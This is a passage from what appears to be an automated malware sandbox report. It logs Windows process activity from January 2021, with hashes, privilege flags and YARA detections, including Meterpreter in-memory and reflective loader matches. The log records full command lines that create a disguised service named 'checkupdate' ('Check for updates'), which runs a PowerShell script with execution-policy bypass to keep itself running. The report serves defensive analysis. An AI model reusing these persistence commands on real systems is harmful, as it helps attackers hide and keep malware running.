                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.793327668.000000000469F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.789971993.0000000000B70000.00000004.00000020.sdmp, Author: Florian Roth
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000003.740498295.0000000000BE4000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmp, Author: Florian Roth
                  Reputation:high

                  General

                  Start time:10:31:08
                  Start date:20/01/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:41
                  Start date:20/01/2021
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Imagebase:0x7ff6eb840000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:45
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /C sc delete checkupdate
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:45
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\sc.exe
                  Wow64 process (32bit):true
                  Commandline:sc delete checkupdate
                  Imagebase:0xb80000
                  File size:60928 bytes
                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:10:31:46
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:46
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\sc.exe
                  Wow64 process (32bit):true
                  Commandline:sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
                  Imagebase:0xb80000
                  File size:60928 bytes
                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:10:31:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /C sc start checkupdate
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\sc.exe
                  Wow64 process (32bit):true
                  Commandline:sc start checkupdate
                  Imagebase:0xb80000
                  File size:60928 bytes
                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:10:31:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:48
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:48
                  Start date:20/01/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:10:31:48
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
                  Imagebase:0x1000000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:10:32:24
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs
                  Imagebase:0xb40000
                  File size:44520 bytes
                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Author: netbiosX, Florian Roth
                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Author: unknown
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Author: Florian Roth

                  Disassembly

                  Code Analysis

                  Reset < >